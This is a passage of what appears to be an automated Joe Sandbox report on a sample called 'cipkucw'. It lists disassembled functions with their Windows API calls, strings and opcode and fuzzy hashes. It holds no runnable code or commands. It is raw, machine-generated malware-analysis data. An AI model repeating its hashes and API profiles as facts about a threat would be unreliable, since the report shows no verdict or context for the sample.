                                        • CoUninitialize.OLE32 ref: 007745F1
                                        • _wcslen.LIBCMT ref: 0077468A
                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 0077470E
                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00774832
                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 0077486B
                                        • CoGetObject.OLE32(?,00000000,00790B64,?), ref: 0077488A
                                        • SetErrorMode.KERNEL32(00000000), ref: 0077489D
                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00774921
                                        • VariantClear.OLEAUT32(?), ref: 00774935
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                        • String ID:
                                        • API String ID: 429561992-0
                                        • Opcode ID: 498f88a83ae879c75e24080e22ad8020f08d978e8b5448fc8cbe5da752b52346
                                        • Instruction ID: ccc21d1929a9d41aa89f980d5be4f7dd7acce4e9e512f10f8a076cf7dbcb4b0f
                                        • Opcode Fuzzy Hash: 498f88a83ae879c75e24080e22ad8020f08d978e8b5448fc8cbe5da752b52346
                                        • Instruction Fuzzy Hash: 8FC135B16043059FCB00DF68C88496BB7E9FF89798F10895DF9899B260DB74ED05CB92
                                        Function 007683F0 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 0076844D
                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 007684E9
                                        • SHGetDesktopFolder.SHELL32(?), ref: 007684FD
                                        • CoCreateInstance.OLE32(00790CD4,00000000,00000001,007B7E8C,?), ref: 00768549
                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 007685CE
                                        • CoTaskMemFree.OLE32(?,?), ref: 00768626
                                        • SHBrowseForFolderW.SHELL32(?), ref: 007686B1
                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 007686D4
                                        • CoTaskMemFree.OLE32(00000000), ref: 007686DB
                                        • CoTaskMemFree.OLE32(00000000), ref: 00768730
                                        • CoUninitialize.OLE32 ref: 00768736
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                        • String ID:
                                        • API String ID: 2762341140-0
                                        • Opcode ID: 97415a0d21c22e4d87d9faca0eaf2f25ae9c2b79a1d421fb4e6784aa77885c5f
                                        • Instruction ID: f23e088810098702689044ec9455a2e4d3b7747a5cc9223c0a47edab2b2570ca
                                        • Opcode Fuzzy Hash: 97415a0d21c22e4d87d9faca0eaf2f25ae9c2b79a1d421fb4e6784aa77885c5f
                                        • Instruction Fuzzy Hash: 5FC12A75A00209AFCB54DFA4C884DAEBBF5FF48314B148198F91AEB262DB34ED45CB51
                                        Function 00750318 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0075033F
                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00750398
                                        • VariantInit.OLEAUT32(?), ref: 007503AA
                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 007503CA
                                        • VariantCopy.OLEAUT32(?,?), ref: 0075041D
                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00750431
                                        • VariantClear.OLEAUT32(?), ref: 00750446
                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00750453
                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0075045C
                                        • VariantClear.OLEAUT32(?), ref: 0075046E
                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00750479
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                        • String ID:
                                        • API String ID: 2706829360-0
                                        • Opcode ID: 182b98ba7f40d1a3a734f144a3793a3fc7027b42e3c2c0499146a963a2294188
                                        • Instruction ID: 2f5a4a8c022dc10477667c2327caefa16564ab68febecb5bdfa5cb375fecc2fa
                                        • Opcode Fuzzy Hash: 182b98ba7f40d1a3a734f144a3793a3fc7027b42e3c2c0499146a963a2294188
                                        • Instruction Fuzzy Hash: E5417075A00219DFCB10DFA4C8489EEBBB9FF48355F10C029ED59A7261CB78AD46CB90
                                        Function 0078A8E5 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 260windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 006F2441: GetWindowLongW.USER32(00000000,000000EB), ref: 006F2452
                                        • GetSystemMetrics.USER32(0000000F), ref: 0078A926
                                        • GetSystemMetrics.USER32(0000000F), ref: 0078A946
                                        • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0078AB83
                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0078ABA1
                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0078ABC2
                                        • ShowWindow.USER32(00000003,00000000), ref: 0078ABE1
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0078AC06
                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 0078AC29
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                        • String ID:
                                        • API String ID: 1211466189-3916222277
                                        • Opcode ID: ff5bc980ddbfbb80dc2901859ebcd61646b805c06c97bf01ec037f566a576dd6
                                        • Instruction ID: 0f464b4ae261ea92c8b14c4beac57912699519e5d12b9bfb1e2fdd022cdb797e
                                        • Opcode Fuzzy Hash: ff5bc980ddbfbb80dc2901859ebcd61646b805c06c97bf01ec037f566a576dd6
                                        • Instruction Fuzzy Hash: 0EB1AB71640219EFEF14DF28C984BAE3BB2FF44700F18C06AEC459B295D778A950CB62
                                        Function 00770EB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WSAStartup.WSOCK32(00000101,?), ref: 00770F19
                                        • inet_addr.WSOCK32(?), ref: 00770F79
                                        • gethostbyname.WSOCK32(?), ref: 00770F85
                                        • IcmpCreateFile.IPHLPAPI ref: 00770F93
                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00771023
                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00771042
                                        • IcmpCloseHandle.IPHLPAPI(?), ref: 00771116
                                        • WSACleanup.WSOCK32 ref: 0077111C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                        • String ID: Ping
                                        • API String ID: 1028309954-2246546115
                                        • Opcode ID: 870b32f2325af59ec6d4bfe170ea736d3efb65c6bd1f31694752da4656cd5478
                                        • Instruction ID: 5e6190862642eb32fbe1370b4fd9418bc39c11862e77b9f9478671158c939eb7
                                        • Opcode Fuzzy Hash: 870b32f2325af59ec6d4bfe170ea736d3efb65c6bd1f31694752da4656cd5478
                                        • Instruction Fuzzy Hash: 6791AD31604241DFDB20DF29C889F26BBE1AF44358F54C5A9F5698B6A2C739EC85CB81
                                        Function 00768AEF Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLocalTime.KERNEL32(?), ref: 00768BB1
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00768BC1
                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00768BCD
                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00768C6A
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00768C7E
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00768CB0
                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00768CE6
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00768CEF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CurrentDirectoryTime$File$Local$System
                                        • String ID: *.*
                                        • API String ID: 1464919966-438819550
                                        • Opcode ID: 7238a5ab1b82a8727dcacc35757b0eefe1cd475111616331ff1f0e2ec21087f7
                                        • Instruction ID: 7630a0a054e83e80a0304b84f8188ffd35fdc26487c604ddd0f47fbc41b09998
                                        • Opcode Fuzzy Hash: 7238a5ab1b82a8727dcacc35757b0eefe1cd475111616331ff1f0e2ec21087f7
                                        • Instruction Fuzzy Hash: 97618BB25043099FC750EF24C8449AEB3E9FF88320F00891DF99AC3251EB39E945CB62
                                        Function 007845A5 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateMenu.USER32 ref: 007845D8
                                        • SetMenu.USER32(?,00000000), ref: 007845E7
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0078466F
                                        • IsMenu.USER32(?), ref: 00784683
                                        • CreatePopupMenu.USER32 ref: 0078468D
                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007846BA
                                        • DrawMenuBar.USER32 ref: 007846C2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                        • String ID: 0$F
                                        • API String ID: 161812096-3044882817
                                        • Opcode ID: 51cfa9dbd3ede8f6ec3260d1b8c06f127e5bda917dca8d1e77c621a70bec9a5f
                                        • Instruction ID: e01110c71144b6ef6650e1dd78a6d79aa2612bdfc5c052432f450ae492cc4254
                                        • Opcode Fuzzy Hash: 51cfa9dbd3ede8f6ec3260d1b8c06f127e5bda917dca8d1e77c621a70bec9a5f
                                        • Instruction Fuzzy Hash: 2141777460120AEFDF24DF64D858EAA7BB5FF0A314F144029EA45A7390DB79AD20CB54
                                        Function 0075276F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 006FB25F: _wcslen.LIBCMT ref: 006FB269
                                          • Part of subcall function 00754536: GetClassNameW.USER32(?,?,000000FF), ref: 00754559
                                        • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 007527F4
                                        • GetDlgCtrlID.USER32 ref: 007527FF
                                        • GetParent.USER32 ref: 0075281B
                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0075281E
                                        • GetDlgCtrlID.USER32(?), ref: 00752827
                                        • GetParent.USER32(?), ref: 0075283B
                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0075283E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 711023334-1403004172
                                        • Opcode ID: d5e8a1b467411fd25c9af48da565544932b255cc98c76023fb02d3515141755b
                                        • Instruction ID: 1b84400a505c7550d183e09ec06b2a999bab6aac8b2e1de157655e613275da8e
                                        • Opcode Fuzzy Hash: d5e8a1b467411fd25c9af48da565544932b255cc98c76023fb02d3515141755b
                                        • Instruction Fuzzy Hash: 0C21C1B0900118FBCF10AFA0CC84AFEBB75EF05350F104119BA51932A6DA7859098B64
                                        Function 00752850 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 006FB25F: _wcslen.LIBCMT ref: 006FB269
                                          • Part of subcall function 00754536: GetClassNameW.USER32(?,?,000000FF), ref: 00754559
                                        • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 007528D3
                                        • GetDlgCtrlID.USER32 ref: 007528DE
                                        • GetParent.USER32 ref: 007528FA
                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 007528FD
                                        • GetDlgCtrlID.USER32(?), ref: 00752906
                                        • GetParent.USER32(?), ref: 0075291A
                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0075291D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 711023334-1403004172
                                        • Opcode ID: bad474777270bd5e37c8f37bfd3f120fd2585c890e14dd3fafc5d4bc4bca109d
                                        • Instruction ID: fd3b011aff8fda2f1a19b1d29ae676b3efa4b95a8d244973e08c4cabf7cd2a64
                                        • Opcode Fuzzy Hash: bad474777270bd5e37c8f37bfd3f120fd2585c890e14dd3fafc5d4bc4bca109d
                                        • Instruction Fuzzy Hash: 632104B5A00108FBCF11AFA0CC84EFEBBB9EF05340F104005BA50A32A6DBBD5909CB24
                                        Function 00784382 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007843FC
                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007843FF
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00784426
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00784449
                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007844C1
                                        • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 0078450B
                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00784526
                                        • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00784541
                                        • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00784555
                                        • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00784572
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: MessageSend$LongWindow
                                        • String ID:
                                        • API String ID: 312131281-0
                                        • Opcode ID: 58be36a08cfc166bbb7f24125c753d739a84eb0652f14456f5de71285a437a6a
                                        • Instruction ID: 70958bc5df7aa01bf9e1395f3c23382662533affa598ccc9afac63431f3de5cc
                                        • Opcode Fuzzy Hash: 58be36a08cfc166bbb7f24125c753d739a84eb0652f14456f5de71285a437a6a
                                        • Instruction Fuzzy Hash: 96617C75940209AFDB11DFA8CC81EEE77B8EB09310F104159FA14E72A2C7B8AA56DF54
                                        Function 0076CBB0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0076CBCF
                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0076CBF7
                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0076CC27
                                        • GetLastError.KERNEL32 ref: 0076CC7F
                                        • SetEvent.KERNEL32(?), ref: 0076CC93
                                        • InternetCloseHandle.WININET(00000000), ref: 0076CC9E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                        • String ID:
                                        • API String ID: 3113390036-3916222277
                                        • Opcode ID: 21df391fd60b8a6e3b4adb776396378a71a02b5c4947d9b13228b005682650f3
                                        • Instruction ID: 9c99d5e939ed23c52afbeb831c68cb14fd03a9dd87aac0b58faaaf855d1cfd55
                                        • Opcode Fuzzy Hash: 21df391fd60b8a6e3b4adb776396378a71a02b5c4947d9b13228b005682650f3
                                        • Instruction Fuzzy Hash: EA314BB1600308AFD7229F65CD89ABB7BFCEB49744B10451AE88AD2240DB38DD049B75
                                        Function 0075A12A Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00735437,?,?,Bad directive syntax error,0078DCD0,00000000,00000010,?,?), ref: 0075A14B
                                        • LoadStringW.USER32(00000000,?,00735437,?), ref: 0075A152
                                          • Part of subcall function 006FB25F: _wcslen.LIBCMT ref: 006FB269
                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0075A216
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: HandleLoadMessageModuleString_wcslen
                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                        • API String ID: 858772685-4153970271
                                        • Opcode ID: 027928cb04d88a0cd1843e1ac88e4faa115701dedd836964544d309e3106402d
                                        • Instruction ID: 18a9512c1f27443a1faf3eba004521affeda327e549eae2d8be73ad41c374866
                                        • Opcode Fuzzy Hash: 027928cb04d88a0cd1843e1ac88e4faa115701dedd836964544d309e3106402d
                                        • Instruction Fuzzy Hash: 8C219F7194025EFFCF15AF90CC0AEFE777ABF18304F044469F605660A2DA799A18DB25
                                        Function 0075292F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetParent.USER32 ref: 0075293B
                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00752950
                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 007529DD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameParentSend
                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                        • API String ID: 1290815626-3381328864
                                        • Opcode ID: c06c4e1fcb12c96b3c74bd2e395d6605199e5adfae575b213f7d4cf900ef5145
                                        • Instruction ID: 992df5133c440f462a9a4d4b6f4920e6a0498fa08a39e941c594629152745a14
                                        • Opcode Fuzzy Hash: c06c4e1fcb12c96b3c74bd2e395d6605199e5adfae575b213f7d4cf900ef5145
                                        • Instruction Fuzzy Hash: E91191B6388306BAFA142624AC0BDE677AC9F06761F300016FE44F52D2EBAD69865554
                                        Function 0076CAA0 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0076CADF
                                        • GetLastError.KERNEL32 ref: 0076CAF2
                                        • SetEvent.KERNEL32(?), ref: 0076CB06
                                          • Part of subcall function 0076CBB0: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0076CBCF
                                          • Part of subcall function 0076CBB0: GetLastError.KERNEL32 ref: 0076CC7F
                                          • Part of subcall function 0076CBB0: SetEvent.KERNEL32(?), ref: 0076CC93
                                          • Part of subcall function 0076CBB0: InternetCloseHandle.WININET(00000000), ref: 0076CC9E
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                        • String ID:
